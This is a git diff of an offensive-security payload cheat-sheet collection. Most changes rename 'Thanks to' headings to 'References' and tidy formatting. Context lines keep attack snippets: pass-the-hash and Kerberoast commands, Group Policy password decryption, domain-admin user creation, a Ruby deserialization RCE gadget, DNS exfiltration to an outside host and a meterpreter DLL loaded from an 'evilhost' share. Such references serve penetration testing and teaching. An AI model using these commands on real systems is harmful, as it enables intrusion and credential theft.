diff --git a/AWS Amazon Bucket S3/README.md b/AWS Amazon Bucket S3/README.md index 53e27d1..af9e326 100644 --- a/AWS Amazon Bucket S3/README.md +++ b/AWS Amazon Bucket S3/README.md @@ -149,7 +149,7 @@ List of Fortune1000 company names with permutations on .com, -backup, -media. Fo List of the top Alexa 100,000 sites with permutations on the TLD and www. For example, walmart.com becomes www.walmart.com, www.walmart.net, walmart.com, and walmart. ``` -## Thanks to +## References * https://community.rapid7.com/community/infosec/blog/2013/03/27/1951-open-s3-buckets * https://digi.ninja/projects/bucket_finder.php diff --git a/CRLF injection/README.md b/CRLF injection/README.md index de63586..862a3e5 100644 --- a/CRLF injection/README.md +++ b/CRLF injection/README.md @@ -95,7 +95,7 @@ Remainder: * %E5%98%BE = %3E = \u563e (>) * %E5%98%BC = %3C = \u563c (<) -## Thanks to +## References * https://www.owasp.org/index.php/CRLF_Injection * https://vulners.com/hackerone/H1:192749 diff --git a/CSV injection/README.md b/CSV injection/README.md index ab22368..5430482 100644 --- a/CSV injection/README.md +++ b/CSV injection/README.md @@ -25,7 +25,7 @@ Any formula can be started with @ ``` -## Thanks to +## References * [OWASP - CSV Excel Macro Injection](https://owasp.org/index.php/CSV_Excel_Macro_Injection) * [Google Bug Hunter University - CSV Excel formula injection](https://sites.google.com/site/bughunteruniversity/nonvuln/csv-excel-formula-injection) diff --git a/File Inclusion - Path Traversal/README.md b/File Inclusion - Path Traversal/README.md index e9c14b5..9191db2 100644 --- a/File Inclusion - Path Traversal/README.md +++ b/File Inclusion - Path Traversal/README.md 
@@ -339,7 +339,7 @@ Use the LFI to include the PHP session file login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27 ``` -## Thanks to +## References * [OWASP LFI](https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion) * [HighOn.coffee LFI Cheat](https://highon.coffee/blog/lfi-cheat-sheet/) diff --git a/Insecure deserialization/Java.md b/Insecure deserialization/Java.md index 50e90f8..f3606d1 100644 --- a/Insecure deserialization/Java.md +++ b/Insecure deserialization/Java.md @@ -63,7 +63,7 @@ JRE8u20_RCE_Gadget JexBoss - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool, [https://github.com/joaomatosf/jexboss](https://github.com/joaomatosf/jexboss) -## Thanks to +## References - [Github - ysoserial](https://github.com/frohoff/ysoserial) - [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md) diff --git a/Insecure deserialization/PHP.md b/Insecure deserialization/PHP.md index 3027932..883acf9 100644 --- a/Insecure deserialization/PHP.md +++ b/Insecure deserialization/PHP.md @@ -153,7 +153,7 @@ phpggc monolog/rce1 'phpinfo();' -s * [Vanilla Forums domGetImages getimagesize Unserialize Remote Code Execution Vulnerability (critical) - Steven Seeley](https://hackerone.com/reports/410882) * [Vanilla Forums Gdn_Format unserialize() Remote Code Execution Vulnerability - Steven Seeley](https://hackerone.com/reports/407552) -## Thanks to +## References * [PHP Object Injection - OWASP](https://www.owasp.org/index.php/PHP_Object_Injection) * [PHP Object Injection - Thin Ba Shane](http://location-href.com/php-object-injection/) diff --git a/Insecure deserialization/Python.md b/Insecure deserialization/Python.md index 1a1ef5b..41887f6 100644 --- a/Insecure deserialization/Python.md +++ b/Insecure deserialization/Python.md 
@@ -44,7 +44,7 @@ evil_token = b64encode(cPickle.dumps(e)) print("Your Evil Token : {}").format(evil_token) ``` -## Thanks to +## References * [Exploiting misuse of Python's "pickle" - Mar 20, 2011](https://blog.nelhage.com/2011/03/exploiting-pickle/) * [Python Pickle Injection - Apr 30, 2017](http://xhyumiracle.com/python-pickle-injection/) \ No newline at end of file diff --git a/Insecure deserialization/README.md b/Insecure deserialization/README.md index d2af35a..a0346d0 100644 --- a/Insecure deserialization/README.md +++ b/Insecure deserialization/README.md @@ -9,7 +9,7 @@ Check the following sub-sections, located in other files : * [Ruby : universal rce gadget, ...](Ruby.md) * [Python : pickle, ...](Python.md) -## Thanks to +## References * [Github - ysoserial](https://github.com/frohoff/ysoserial) * [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md) diff --git a/Insecure deserialization/Ruby.md b/Insecure deserialization/Ruby.md index 9564493..bf33886 100644 --- a/Insecure deserialization/Ruby.md +++ b/Insecure deserialization/Ruby.md 
@@ -6,7 +6,7 @@ Script to generate and verify the deserialization gadget chain against Ruby 2.0 for i in {0..5}; do docker run -it ruby:2.${i} ruby -e 'Marshal.load(["0408553a1547656d3a3a526571756972656d656e745b066f3a1847656d3a3a446570656e64656e63794c697374073a0b4073706563735b076f3a1e47656d3a3a536f757263653a3a537065636966696346696c65063a0a40737065636f3a1b47656d3a3a5374756253706563696669636174696f6e083a11406c6f616465645f66726f6d49220d7c696420313e2632063a0645543a0a4064617461303b09306f3b08003a1140646576656c6f706d656e7446"].pack("H*")) rescue nil'; done ``` -## Thanks to +## References - [RUBY 2.X UNIVERSAL RCE DESERIALIZATION GADGET CHAIN - elttam, Luke Jahnke](https://www.elttam.com.au/blog/ruby-deserialization/) - [Online access to Ruby 2.x Universal RCE Deserialization Gadget Chain - PentesterLab](https://pentesterlab.com/exercises/ruby_ugadget/online) \ No newline at end of file diff --git a/Insecure direct object references/README.md b/Insecure direct object references/README.md index bf3bd97..0018ca4 100644 --- a/Insecure direct object references/README.md +++ b/Insecure direct object references/README.md @@ -41,7 +41,7 @@ http://foo.bar/accessPage?menuitem=12 * [HackerOne - IDOR to view User Order Information - meals](https://hackerone.com/reports/287789) * [HackerOne - IDOR on HackerOne Feedback Review - japz](https://hackerone.com/reports/262661) -## Thanks to +## References * [OWASP - Testing for Insecure Direct Object References (OTG-AUTHZ-004)](https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_(OTG-AUTHZ-004)) * [OWASP - Insecure Direct Object Reference Prevention Cheat Sheet](https://www.owasp.org/index.php/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet) diff --git a/Insecure management interface/README.md b/Insecure management interface/README.md index da18d8d..9bb8511 100644 --- a/Insecure management interface/README.md +++ b/Insecure management interface/README.md 
@@ -2,8 +2,18 @@ ## Springboot-Actuator -Actuator endpoints let you monitor and interact with your application. Spring Boot includes a number of built-in endpoints and lets you add your own. For example, the health endpoint provides basic application health information. Some of them contains sensitive info such as `/trace` (by default the last 100 HTTP requests with headers), `/env` (the current environment properties) or `/heapdump` (builds and returns a heap dump from the JVM used by our application). These endpoints are enabled by default in Springboot 1.X. Since Springboot 2.x only `/health` and `/info` are enabled by default. +Actuator endpoints let you monitor and interact with your application. +Spring Boot includes a number of built-in endpoints and lets you add your own. +For example, the health endpoint provides basic application health information. +Some of them contains sensitive info such as : -the official documentation is located [here](https://docs.spring.io/spring-boot/docs/current/reference/html/production-ready-endpoints.html) +- `/trace` (by default the last 100 HTTP requests with headers) +- `/env` (the current environment properties) +- `/heapdump` (builds and returns a heap dump from the JVM used by our application). -## Thanks to +These endpoints are enabled by default in Springboot 1.X. Since Springboot 2.x only `/health` and `/info` are enabled by default. + + +## References + +* [Springboot - Official Documentation](https://docs.spring.io/spring-boot/docs/current/reference/html/production-ready-endpoints.html) diff --git a/Insecure source code management/README.md b/Insecure source code management/README.md index d9e6258..53c8b09 100644 --- a/Insecure source code management/README.md +++ b/Insecure source code management/README.md 
@@ -167,7 +167,7 @@ git clone https://github.com/anantshri/svn-extractor.git python svn-extractor.py –url "url with .svn available" ``` -## Thanks to +## References - [bl4de, hidden_directories_leaks](https://github.com/bl4de/research/tree/master/hidden_directories_leaks) - [bl4de, diggit](https://github.com/bl4de/security-tools/tree/master/diggit) diff --git a/JSON Web Token/README.md b/JSON Web Token/README.md index 4165a0b..89090e0 100644 --- a/JSON Web Token/README.md +++ b/JSON Web Token/README.md @@ -136,7 +136,7 @@ Secret is "Sn1f" eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMj...Fh7HgQ:secret ``` -## Thanks +## References - [Hacking JSON Web Token (JWT) - Hate_401](https://medium.com/101-writeups/hacking-json-web-token-jwt-233fe6c862e6) - [WebSec CTF - Authorization Token - JWT Challenge](https://ctf.rip/websec-ctf-authorization-token-jwt-challenge/) diff --git a/LDAP injection/README.md b/LDAP injection/README.md index cdf5cec..ab77077 100644 --- a/LDAP injection/README.md +++ b/LDAP injection/README.md @@ -96,7 +96,7 @@ userPassword:2.5.13.18:=\xx\xx userPassword:2.5.13.18:=\xx\xx\xx ``` -## Thanks to +## References * [OWASP LDAP Injection](https://www.owasp.org/index.php/LDAP_injection) * [LDAP Blind Explorer](http://code.google.com/p/ldap-blind-explorer/) diff --git a/LaTeX injection/README.md b/LaTeX injection/README.md index bf42890..6a02010 100644 --- a/LaTeX injection/README.md +++ b/LaTeX injection/README.md @@ -66,7 +66,7 @@ If you get any LaTex error, consider using base64 to get the result without bad \input{|"/bin/hostname"} ``` -## Thanks to +## References * [Hacking with LaTeX - Sebastian Neef - 0day.work](https://0day.work/hacking-with-latex/) * [Latex to RCE, Private Bug Bounty Program - Yasho](https://medium.com/bugbountywriteup/latex-to-rce-private-bug-bounty-program-6a0b5b33d26a) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 82ed02e..d489d42 100644 
--- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -84,8 +84,8 @@ mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache" ```powershell pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/Share -ls # list files -cd +ls # list files +cd # move inside a folder get # download files put # replace a file ``` @@ -94,6 +94,18 @@ or ```powershell smbclient -I 10.10.10.100 -L ACTIVE -N -U "" + Sharename Type Comment + --------- ---- ------- + ADMIN$ Disk Remote Admin + C$ Disk Default share + IPC$ IPC Remote IPC + NETLOGON Disk Logon server share + Replication Disk + SYSVOL Disk Logon server share + Users Disk +use Sharename # select a Sharename +cd Folder # move inside a folder +ls # list files ``` Mount a share @@ -117,7 +129,10 @@ Decrypt a Group Policy Password found in SYSVOL (by [0x00C651E0](https://twitter ```bash echo 'password_in_base64' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000 -e.g: echo '5OPdEKwZSf7dYAvLOe6RzRDtcvT/wCP8g5RqmAgjSso=' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000 +e.g: +echo '5OPdEKwZSf7dYAvLOe6RzRDtcvT/wCP8g5RqmAgjSso=' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000 + +echo 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000 ``` Metasploit modules to enumerate shares and credentials 
@@ -319,7 +334,7 @@ TODO ### Kerberoast ```powershell -GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request-user Administrator > +$ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request-user Administrator > Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies @@ -337,11 +352,6 @@ hashcat -m 13100 -a 0 hash.txt crackstation.txt ./john ~/hash.txt --wordlist=rockyou.lst ``` - -- https://www.exploit-db.com/docs/english/45051-abusing-kerberos---kerberoasting.pdf -- https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/ -- https://room362.com/post/2016/kerberoast-pt1/ - ### Pass-the-Hash The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes. @@ -463,7 +473,7 @@ net user hacker2 hacker123 /add /Domain net group "Domain Admins" hacker2 /add /domain ``` -## Documentation / Thanks to +## References * [https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html](https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html) * [Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition) - Adam Toscher](https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa) 
@@ -490,4 +500,7 @@ net group "Domain Admins" hacker2 /add /domain * [WONKACHALL AKERVA NDH2018 – WRITE UP PART 5](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-5/) * [BlueHat IL - Benjamin Delpy](https://microsoftrnd.co.il/Press%20Kit/BlueHat%20IL%20Decks/BenjaminDelpy.pdf) * [Quick Guide to Installing Bloodhound in Kali-Rolling - James Smith](https://stealingthe.network/quick-guide-to-installing-bloodhound-in-kali-rolling/) -* [Using bloodhound to map the user network - Hausec](https://hausec.com/2017/10/26/using-bloodhound-to-map-the-user-network/) \ No newline at end of file +* [Using bloodhound to map the user network - Hausec](https://hausec.com/2017/10/26/using-bloodhound-to-map-the-user-network/) +* [Abusing Kerberos: Kerberoasting - Haboob Team](https://www.exploit-db.com/docs/english/45051-abusing-kerberos---kerberoasting.pdf) +* [Invoke-Kerberoast - Powersploit Read the docs](https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/) +* [Kerberoasting - Part 1 - Mubix “Rob” Fuller](https://room362.com/post/2016/kerberoast-pt1/) diff --git a/Methodology and Resources/Linux - Persistence.md b/Methodology and Resources/Linux - Persistence.md index a0ad6ab..b5895ac 100644 --- a/Methodology and Resources/Linux - Persistence.md +++ b/Methodology and Resources/Linux - Persistence.md @@ -121,7 +121,7 @@ The following directories are temporary and usually writeable /dev/shm/ ``` -## Thanks to +## References * [@RandoriSec - https://twitter.com/RandoriSec/status/1036622487990284289](https://twitter.com/RandoriSec/status/1036622487990284289) * [https://blogs.gnome.org/muelli/2009/06/g0t-r00t-pwning-a-machine/](https://blogs.gnome.org/muelli/2009/06/g0t-r00t-pwning-a-machine/) diff --git a/Methodology and Resources/Metasploit CheatSheet.md b/Methodology and Resources/Metasploit CheatSheet.md index e6a8052..5313267 100644 --- a/Methodology and Resources/Metasploit CheatSheet.md +++ b/Methodology and Resources/Metasploit CheatSheet.md 
@@ -158,6 +158,6 @@ Add-WebTransport -Url http(s)://:/ -RetryWait 10 -RetryTotal 3 * MS17-10 Eternal Blue - `exploit/windows/smb/ms17_010_eternalblue` * MS08_67 - `exploit/windows/smb/ms08_067_netapi` -## Thanks to +## References * [Multiple transports in a meterpreter payload - ionize](https://ionize.com.au/multiple-transports-in-a-meterpreter-payload/) diff --git a/Methodology and Resources/Methodology_and_enumeration.md b/Methodology and Resources/Methodology_and_enumeration.md index 57b56d2..675c08c 100644 --- a/Methodology and Resources/Methodology_and_enumeration.md +++ b/Methodology and Resources/Methodology_and_enumeration.md @@ -268,7 +268,7 @@ International test card numbers and tokens | 4000002460000001 | tok_fi | Finland (FI) | Visa | | 4000002500000003 | tok_fr | France (FR) | Visa | -## Thanks to +## References * [[BugBounty] Yahoo phpinfo.php disclosure - Patrik Fehrenbach](http://blog.it-securityguard.com/bugbounty-yahoo-phpinfo-php-disclosure-2/) * [Nmap CheatSheet - HackerTarget](https://hackertarget.com/nmap-cheatsheet-a-quick-reference-guide/) diff --git a/Methodology and Resources/Network Discovery.md b/Methodology and Resources/Network Discovery.md index 0ecfaaf..cd53bae 100644 --- a/Methodology and Resources/Network Discovery.md +++ b/Methodology and Resources/Network Discovery.md @@ -135,6 +135,6 @@ python2.7 ./reconnoitre.py -t 192.168.1.2-252 -o ./results/ --pingsweep --hostna If you have a segfault with nbtscan, read the following quote. > Permission is denied on the broadcast address (.0) and it segfaults on the gateway (.1) - all other addresses seem fine here.So to mitigate the problem: nbtscan 192.168.0.2-255 -## Thanks +## References * [TODO](TODO) \ No newline at end of file diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md index be5a125..e69f7c0 100644 --- a/Methodology and Resources/Network Pivoting Techniques.md 
+++ b/Methodology and Resources/Network Pivoting Techniques.md @@ -165,7 +165,7 @@ plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your loc | remote host 1 | `ncat -l -p 8080 < file | | remote host 2 | `ncat -l -p 9090 > newfile` | -## Thanks to +## References * [Network Pivoting Techniques - Bit rot](https://bitrot.sh/cheatsheet/14-12-2017-pivoting/) * [Port Forwarding in Windows - Windows OS Hub](http://woshub.com/port-forwarding-in-windows/) diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index a967976..aca8882 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md @@ -223,7 +223,7 @@ stty rows columns !sh ``` -## Thanks to +## References * [Reverse Bash Shell One Liner](https://security.stackexchange.com/questions/166643/reverse-bash-shell-one-liner) * [Pentest Monkey - Cheat Sheet Reverse shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) diff --git a/Methodology and Resources/Subdomains Enumeration.md b/Methodology and Resources/Subdomains Enumeration.md index 72fff2d..0806a99 100644 --- a/Methodology and Resources/Subdomains Enumeration.md +++ b/Methodology and Resources/Subdomains Enumeration.md @@ -177,7 +177,7 @@ go get github.com/Ice3man543/SubOver ./SubOver -l subdomains.txt ``` -## Thanks +## References * [Subdomain Takeover: Proof Creation for Bug Bounties - Patrik Hudak](https://0xpatrik.com/takeover-proofs/) * [Subdomain Takeover: Basics - Patrik Hudak](https://0xpatrik.com/subdomain-takeover-basics/) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Download and Execute.md b/Methodology and Resources/Windows - Download and Execute.md index 8e66c90..4f729b2 100644 --- a/Methodology and Resources/Windows - Download and Execute.md +++ b/Methodology and Resources/Windows - Download and Execute.md 
@@ -101,6 +101,6 @@ bitsadmin /transfer mydownloadjob /download /priority normal http:// ``` -## Thanks to +## References - [arno0x0x - Windows oneliners to download remote payload and execute arbitrary code](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) diff --git a/Methodology and Resources/Windows - Mimikatz.md b/Methodology and Resources/Windows - Mimikatz.md index d6ba086..6df9c14 100644 --- a/Methodology and Resources/Windows - Mimikatz.md +++ b/Methodology and Resources/Windows - Mimikatz.md @@ -85,7 +85,7 @@ More informations can be grabbed from the Memory with : - [Invoke-Mimikittenz](https://raw.githubusercontent.com/putterpanda/mimikittenz/master/Invoke-mimikittenz.ps1) -## Thanks to +## References - [Unofficial Guide to Mimikatz & Command Reference](https://adsecurity.org/?page_id=1821) - [Skeleton Key](https://pentestlab.blog/2018/04/10/skeleton-key/) diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md index 8bddb02..4873b3d 100644 --- a/Methodology and Resources/Windows - Persistence.md +++ b/Methodology and Resources/Windows - Persistence.md @@ -63,7 +63,7 @@ PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S PS C:\> Register-ScheduledTask Backdoor -InputObject $D ``` -## Thanks to +## References * [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/) * [Windows Persistence Commands - Pwn Wiki](http://pwnwiki.io/#!persistence/windows/index.md) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Post Exploitation Koadic.md b/Methodology and Resources/Windows - Post Exploitation Koadic.md index 1847be4..9caea72 100644 --- a/Methodology and Resources/Windows - Post Exploitation Koadic.md +++ b/Methodology and Resources/Windows - Post Exploitation Koadic.md 
@@ -117,7 +117,7 @@ implant/utils/download_file | Downloads a file from the target zombie. implant/utils/multi_module | Run a number of implants in succession. implant/utils/upload_file | Uploads a file from the listening server to the target zombies. -## Thanks +## References - [Pentestlab - koadic](https://pentestlab.blog/tag/koadic/) - [zerosum0x0 Github - koadic](https://github.com/zerosum0x0/koadic) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 93bdb7b..346ad27 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -206,7 +206,7 @@ wsl whoami wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE' ``` -## Thanks to +## References * [The Open Source Windows Privilege Escalation Cheat Sheet by amAK.xyz and @xxByte](https://addaxsoft.com/wpecs/) * [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md index d94b811..5f848a4 100644 --- a/Methodology and Resources/Windows - Using credentials.md +++ b/Methodology and Resources/Windows - Using credentials.md @@ -137,7 +137,7 @@ PsExec.exe \\ordws01.cscou.lab -u CSCOU\jarrieta -p nastyCutt3r cmd.exe PsExec.exe \\ordws01.cscou.lab -u CSCOU\jarrieta -p nastyCutt3r cmd.exe -s # get System shell ``` -## Thanks +## References - [Ropnop - Using credentials to own Windows boxes](https://blog.ropnop.com/using-credentials-to-own-windows-boxes/) - [Ropnop - Using credentials to own Windows boxes Part 2](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/) diff --git a/NoSQL injection/README.md b/NoSQL injection/README.md index 0fc0f85..811cd3b 100644 --- a/NoSQL injection/README.md +++ b/NoSQL injection/README.md 
@@ -84,7 +84,7 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi [$ne]=1 ``` -## Thanks to +## References * [Les NOSQL injections Classique et Blind: Never trust user input - Geluchat](https://www.dailysecurity.fr/nosql-injections-classique-blind/) * [Testing for NoSQL injection - OWASP](https://www.owasp.org/index.php/Testing_for_NoSQL_injection) diff --git a/OAuth/README.md b/OAuth/README.md index f58d156..8553069 100644 --- a/OAuth/README.md +++ b/OAuth/README.md @@ -46,7 +46,7 @@ Applications that do not check for a valid CSRF token in the OAuth callback are > The client MUST implement CSRF protection for its redirection URI. This is typically accomplished by requiring any request sent to the redirection URI endpoint to include a value that binds the request to the user-agent's authenticated state. The client SHOULD utilize the "state" request parameter to deliver this value to the authorization server when making an authorization request. -## Thanks to +## References * [All your Paypal OAuth tokens belong to me - localhost for the win - INTO THE SYMMETRY](http://blog.intothesymmetry.com/2016/11/all-your-paypal-tokens-belong-to-me.html) * [OAuth 2 - How I have hacked Facebook again (..and would have stolen a valid access token) - INTO THE SYMMETRY](http://intothesymmetry.blogspot.ch/2014/04/oauth-2-how-i-have-hacked-facebook.html) diff --git a/Open redirect/README.md b/Open redirect/README.md index d2d6512..9ce644f 100644 --- a/Open redirect/README.md +++ b/Open redirect/README.md @@ -124,7 +124,7 @@ http://www.example.com/redirect.php?url=javascript:prompt(1) ?return_path={payload} ``` -## Thanks to +## References * filedescriptor * [OWASP - Unvalidated Redirects and Forwards Cheat Sheet](https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet) diff --git a/PHP juggling type/README.md b/PHP juggling type/README.md index 75de094..2c7d7b1 100644 --- a/PHP juggling type/README.md 
+++ b/PHP juggling type/README.md @@ -56,7 +56,7 @@ var_dump(sha1('aaO8zKZF') == sha1('aa3OFF9m')); ?> ``` -## Thanks to +## References * [Writing Exploits For Exotic Bug Classes: PHP Type Juggling By Tyler Borland](http://turbochaos.blogspot.com/2013/08/exploiting-exotic-bugs-php-type-juggling.html) * [Magic Hashes - WhieHatSec](https://www.whitehatsec.com/blog/magic-hashes/) \ No newline at end of file diff --git a/Remote commands execution/README.md b/Remote commands execution/README.md index 40df955..8235cca 100644 --- a/Remote commands execution/README.md +++ b/Remote commands execution/README.md @@ -156,7 +156,7 @@ for i in $(ls /) ; do host "http://$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done $(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il) ``` -## Thanks to +## References * [SECURITY CAFÉ - Exploiting Timed Based RCE](https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/) * [Bug Bounty Survey - Windows RCE spaceless](https://twitter.com/bugbsurveys/status/860102244171227136) diff --git a/SQL injection/Cassandra Injection.md b/SQL injection/Cassandra Injection.md index 1084ce3..e66949e 100644 --- a/SQL injection/Cassandra Injection.md +++ b/SQL injection/Cassandra Injection.md @@ -32,6 +32,6 @@ SELECT * FROM users WHERE user = 'admin'/*' AND pass = '*/and pass>'' ALLOW FILT Example from EternalNoob : [https://hack2learn.pw/cassandra/login.php](https://hack2learn.pw/cassandra/login.php) -## Thanks to +## References * [Injection In Apache Cassandra – Part I - Rodolfo - EternalNoobs](https://eternalnoobs.com/injection-in-apache-cassandra-part-i/) \ No newline at end of file diff --git a/SQL injection/MSSQL Injection.md b/SQL injection/MSSQL Injection.md index de7290d..b71a95b 100644 --- a/SQL injection/MSSQL Injection.md +++ b/SQL injection/MSSQL Injection.md 
@@ -119,7 +119,7 @@ RECONFIGURE EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin; ``` -## Thanks to +## References * [Pentest Monkey - mssql-sql-injection-cheat-sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet) * [Sqlinjectionwiki - MSSQL](http://www.sqlinjectionwiki.com/categories/1/mssql-sql-injection-cheat-sheet/) diff --git a/SQL injection/MySQL Injection.md b/SQL injection/MySQL Injection.md index 0143071..f90978a 100644 --- a/SQL injection/MySQL Injection.md +++ b/SQL injection/MySQL Injection.md @@ -125,3 +125,5 @@ SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php' ``` + +## References \ No newline at end of file diff --git a/SQL injection/OracleSQL Injection.md b/SQL injection/OracleSQL Injection.md index 71bd228..0228cd9 100644 --- a/SQL injection/OracleSQL Injection.md +++ b/SQL injection/OracleSQL Injection.md @@ -91,6 +91,6 @@ EXECUTE IMMEDIATE utl_raw.cast_to_varchar2(hextoraw(''637265617465206f7220726570 SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual; ``` -## Thanks to +## References * [Heavily taken inspired by - NetSpi SQL Wiki](https://sqlwiki.netspi.com/injectionTypes/errorBased/#oracle) diff --git a/SQL injection/PostgreSQL Injection.md b/SQL injection/PostgreSQL Injection.md index cecd0bb..c92b4ae 100644 --- a/SQL injection/PostgreSQL Injection.md +++ b/SQL injection/PostgreSQL Injection.md @@ -44,6 +44,6 @@ SELECT * FROM pentestlab; COPY pentestlab(t) TO '/tmp/pentestlab'; ``` -## Thanks to +## References * [A Penetration Tester’s Guide to PostgreSQL - David Hayter](https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9) \ No newline at end of file diff --git a/SQL injection/README.md b/SQL injection/README.md index 715c3d0..5d0a7bd 100644 --- a/SQL injection/README.md +++ b/SQL injection/README.md 
@@ -460,7 +460,7 @@ mysql> mysql> select version(); +-------------------------+ ``` -## Thanks to - Other resources +## References * Detect SQLi * [Manual SQL Injection Discovery Tips](https://gerbenjavado.com/manual-sql-injection-discovery-tips/) diff --git a/SQL injection/SQLite Injection.md b/SQL injection/SQLite Injection.md index fd48952..0631c0b 100644 --- a/SQL injection/SQLite Injection.md +++ b/SQL injection/SQLite Injection.md @@ -73,6 +73,6 @@ UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain'); Note: By default this component is disabled -## Thanks to +## References [Injecting SQLite database based application - Manish Kishan Tanwar](https://www.exploit-db.com/docs/41397.pdf) diff --git a/SSRF injection/README.md b/SSRF injection/README.md index 3d645b9..20405a9 100644 --- a/SSRF injection/README.md +++ b/SSRF injection/README.md @@ -470,7 +470,7 @@ More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-se - [Blind SSRF on errors.hackerone.net](https://hackerone.com/reports/374737) - [SSRF on *shopifycloud.com](https://hackerone.com/reports/382612) -## Thanks to +## References - [Hackerone - How To: Server-Side Request Forgery (SSRF)](https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF) - [Awesome URL abuse for SSRF by @orange_8361 #BHUSA](https://twitter.com/albinowax/status/890725759861403648) diff --git a/Server Side Template injections/README.md b/Server Side Template injections/README.md index 153b320..2a91737 100644 --- a/Server Side Template injections/README.md +++ b/Server Side Template injections/README.md 
@@ -11,6 +11,10 @@ python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=*&comment=supercomm python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment=A&link" --level 5 -e jade ``` +## Methodology + +![SSTI cheatsheet workflow](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20injections/Images/serverside.png?raw=true) + ## Ruby ### Basic injection @@ -141,7 +145,7 @@ ${x} [Official website](http://jinja.pocoo.org/) > Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed. -### Jinja 2 - Basic injection +### Jinja2 - Basic injection ```python {{4*4}}[[5*5]] 
